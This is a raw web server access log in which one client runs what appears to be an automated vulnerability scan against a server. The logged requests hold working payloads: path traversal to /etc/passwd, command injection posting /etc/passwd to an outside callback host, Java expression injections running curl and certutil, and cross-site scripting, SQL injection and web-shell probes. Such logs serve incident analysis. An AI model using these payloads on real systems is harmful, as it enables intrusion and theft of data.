2023-10-13 11:20:27 103.153.214.94 POST /auth/realms/master/clients-registrations/openid-connect - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 205
2023-10-13 11:20:29 103.153.214.94 POST /realms/master/clients-registrations/default - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 208
2023-10-13 11:20:31 103.153.214.94 POST /realms/master/clients-registrations/openid-connect - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 204
2023-10-13 11:23:50 103.153.214.94 GET /manage/log/view filename=/windows/win.ini&base=../../../../../../../../../../ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 207
2023-10-13 11:23:52 103.153.214.94 GET /log/view filename=/windows/win.ini&base=../../../../../../../../../../ 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 208
2023-10-13 11:23:54 103.153.214.94 GET /manage/log/view filename=/etc/passwd&base=../../../../../../../../../../ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204
2023-10-13 11:23:56 103.153.214.94 GET /log/view filename=/etc/passwd&base=../../../../../../../../../../ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 203
2023-10-13 11:25:00 103.153.214.94 GET /api/getServices name[]=$(wget%20--post-file%20/etc/passwd%20ckjv7uic8b6p3donsoogingzjnjbuhs1y.oast.online) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 0 2 220
2023-10-13 11:25:49 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 209
2023-10-13 11:26:02 103.153.214.94 GET /cf_scripts/scripts/ajax/package/cfajax.js - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 206
2023-10-13 11:26:04 103.153.214.94 GET /cf-scripts/scripts/ajax/package/cfajax.js - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 211
2023-10-13 11:26:06 103.153.214.94 GET /CFIDE/scripts/ajax/package/cfajax.js - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 204
2023-10-13 11:26:06 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/whatever 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 203
2023-10-13 11:26:08 103.153.214.94 GET /cfide/scripts/ajax/package/cfajax.js - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204
2023-10-13 11:26:08 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/../../../context/2WfF0lSubNx05ELkiJBYRZu3zG0.cfm 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 210
2023-10-13 11:26:10 103.153.214.94 GET /CF_SFSD/scripts/ajax/package/cfajax.js - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 203
2023-10-13 11:26:10 103.153.214.94 POST /lucee/2WfF0lSubNx05ELkiJBYRZu3zG0.cfm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 208
2023-10-13 11:26:12 103.153.214.94 GET /cfide-scripts/ajax/package/cfajax.js - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 205
2023-10-13 11:26:14 103.153.214.94 GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 209
2023-10-13 11:27:30 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 211
2023-10-13 11:28:45 103.153.214.94 POST /index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 207
2023-10-13 11:28:47 103.153.214.94 POST /adminer.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 0 2 207
2023-10-13 11:28:49 103.153.214.94 POST /adminer/adminer.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 0 2 207
2023-10-13 11:28:51 103.153.214.94 POST /adminer/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 0 2 205
2023-10-13 11:28:53 103.153.214.94 POST /_adminer.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 203
2023-10-13 11:28:55 103.153.214.94 POST /_adminer/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 203
2023-10-13 11:31:43 103.153.214.94 POST /wp-json/buddypress/v1/signup - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 213
2023-10-13 11:34:22 103.153.214.94 GET /Schemas/${''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("id")')} - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 213
2023-10-13 11:35:34 103.153.214.94 GET /goform/goform_get_cmd_process cmd=psw_fail_num_str 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 http://interact.sh/127.0.0.1.html 200 0 0 209
2023-10-13 11:39:44 103.153.214.94 GET /php/telnet_form.php hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 211
2023-10-13 11:39:49 103.153.214.94 GET /php/ssh_form.php hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 204
2023-10-13 11:40:38 103.153.214.94 GET /php/device_graph_page.php graph=%22zlo%20onerror=alert(1)%20%22 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 213
2023-10-13 11:41:22 103.153.214.94 GET /php/device_graph_page.php device_id=%22zlo%20onerror=alert(1)%20%22 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 208
2023-10-13 11:44:35 103.153.214.94 GET /php/device_graph_page.php is2sim=%22zlo%20onerror=alert(1)%20%22 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 206
2023-10-13 11:46:04 103.153.214.94 GET /php/ping.php hostname=|dir 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 210
2023-10-13 11:47:43 103.153.214.94 GET /messages - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 208
2023-10-13 11:51:11 103.153.214.94 GET /ui/vropspluginui/rest/services/getstatus - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 208
2023-10-13 11:51:19 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 208
2023-10-13 11:51:20 103.153.214.94 GET /ui/vropspluginui/rest/services/getvcdetails - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 205
2023-10-13 11:51:20 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 204
2023-10-13 11:51:33 103.153.214.94 POST /casa/nodes/thumbprints - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 207
2023-10-13 11:51:43 103.153.214.94 POST /logupload logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 207
2023-10-13 11:53:24 103.153.214.94 POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 213
2023-10-13 11:54:53 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 216
2023-10-13 11:54:55 103.153.214.94 POST /analytics/telemetry/ph/api/hyper/send _c&_i=test 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 206
2023-10-13 11:58:07 103.153.214.94 GET /Catalog/BlobHandler.ashx Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 207
2023-10-13 11:58:44 103.153.214.94 GET /hystrix/;a=a/__${T+(java.lang.Runtime).getRuntime().exec("curl+http:/ckjv7uic8b6p3donsoogmefpf8saks4ps.oast.online")}__::.x/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 206
2023-10-13 11:58:46 103.153.214.94 GET /hystrix/;a=a/__${T+(java.lang.Runtime).getRuntime().exec("certutil+-urlcache+-split+-f+http:/ckjv7uic8b6p3donsoog1rkhsyt3pfst8.oast.online")}__::.x/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 203
2023-10-13 11:59:29 103.153.214.94 GET /error3 msg=30&data=';alert('document.domain');// 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 210
2023-10-13 11:59:31 103.153.214.94 GET /omni_success cmdb_edit_path=");alert('document.domain');// 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 204
2023-10-13 11:59:34 103.153.214.94 POST /_bulk - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 203
2023-10-13 12:02:36 103.153.214.94 GET /users/sign_in - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 209
2023-10-13 12:04:03 103.153.214.94 POST /api/v4/ci/lint include_merged_yaml=true 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 0 2 221
2023-10-13 12:05:48 103.153.214.94 POST /AdminService/urest/v1/LogonResource - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 0 2 219
2023-10-13 12:08:47 103.153.214.94 GET /cgi-bin/cgiServer worker=IndexNew 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 209
2023-10-13 12:09:30 103.153.214.94 POST /api/v1/method.callAnon/getPasswordPolicy - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 0 2 236
2023-10-13 12:10:04 103.153.214.94 POST /mgmt/shared/authn/login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 207
2023-10-13 12:13:06 103.153.214.94 GET /ads/www/delivery/lg.php dest=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 207
2023-10-13 12:13:08 103.153.214.94 GET /adserve/www/delivery/lg.php dest=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 12:13:11 103.153.214.94 GET /adserver/www/delivery/lg.php dest=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 205
2023-10-13 12:13:13 103.153.214.94 GET /openx/www/delivery/lg.php dest=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 204
2023-10-13 12:13:15 103.153.214.94 GET /revive/www/delivery/lg.php dest=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 210
2023-10-13 12:13:18 103.153.214.94 GET /www/delivery/lg.php dest=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 635
2023-10-13 12:17:11 103.153.214.94 GET /wp-admin/admin.php page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 208
2023-10-13 12:17:27 103.153.214.94 GET /wp-admin/admin-ajax.php action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=" 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 204
2023-10-13 12:22:32 103.153.214.94 GET /wp-content/plugins/jh-404-logger/readme.txt - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 209
2023-10-13 12:23:47 103.153.214.94 GET /wp-content/plugins/phastpress/phast.php service=scripts&src=https%3A%2F%2Finteract.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 212
2023-10-13 12:25:24 103.153.214.94 GET /wp-login.php login-error=<script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 208
2023-10-13 12:25:47 103.153.214.94 GET / patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 211
2023-10-13 12:28:40 103.153.214.94 GET /tour-list/ keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 208
2023-10-13 12:29:59 103.153.214.94 GET /properties/ keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/2WfF0mBqLxrUnf0wPhBneydKSuS/)%3B%2F%2F 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 588
2023-10-13 12:30:23 103.153.214.94 POST /wp-comments-post.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 206
2023-10-13 12:30:25 103.153.214.94 GET /wp-content/plugins/imagements/images/2wff0dg12qio0elgh7udje9dhfb.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 205
2023-10-13 12:30:32 103.153.214.94 GET /wp-admin/admin.php page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg== 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 203
2023-10-13 12:30:32 103.153.214.94 POST /wp-login.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 202
2023-10-13 12:32:18 103.153.214.94 GET /wp-admin/admin.php page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 209
2023-10-13 12:33:34 103.153.214.94 GET /wp-admin/admin.php page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 208
2023-10-13 12:34:10 103.153.214.94 GET /wp-admin/admin.php page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 210
2023-10-13 12:36:34 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 210
2023-10-13 12:36:56 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 203
2023-10-13 12:37:17 103.153.214.94 GET /index.php page=acymailing_front&ctrl=frontusers&ctrl=frontusers&noheader=1&user[email]=example@mail.com&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 208
2023-10-13 12:37:38 103.153.214.94 POST /wp-admin/admin-ajax.php action=uploadFontIcon 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 211
2023-10-13 12:37:40 103.153.214.94 GET /wp-content/uploads/kaswara/fonts_icon/rualwk/rk.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 205
2023-10-13 12:39:08 103.153.214.94 GET /wp-admin/admin-ajax.php action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)// 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 208
2023-10-13 12:39:42 103.153.214.94 GET /giveaway/mygiveaways/ share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 206
2023-10-13 12:43:28 103.153.214.94 GET / post_type=post&s=%22%3E%3Cscript%3Ealert(/2WfF0URAXW4GUYP79eSbTxg2cHQ/)%3C/script%3E+ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 213
2023-10-13 12:44:47 103.153.214.94 GET /listing/ listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 207
2023-10-13 12:45:00 103.153.214.94 GET /car1/estimateresult/result s&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 205
2023-10-13 12:48:09 103.153.214.94 GET /wp-content/plugins/wp-statistics/readme.txt - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 208
2023-10-13 12:48:11 103.153.214.94 GET /wp-admin/admin.php page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206
2023-10-13 12:48:30 103.153.214.94 POST / ajax-request=jnews 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 208
2023-10-13 12:50:16 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 207
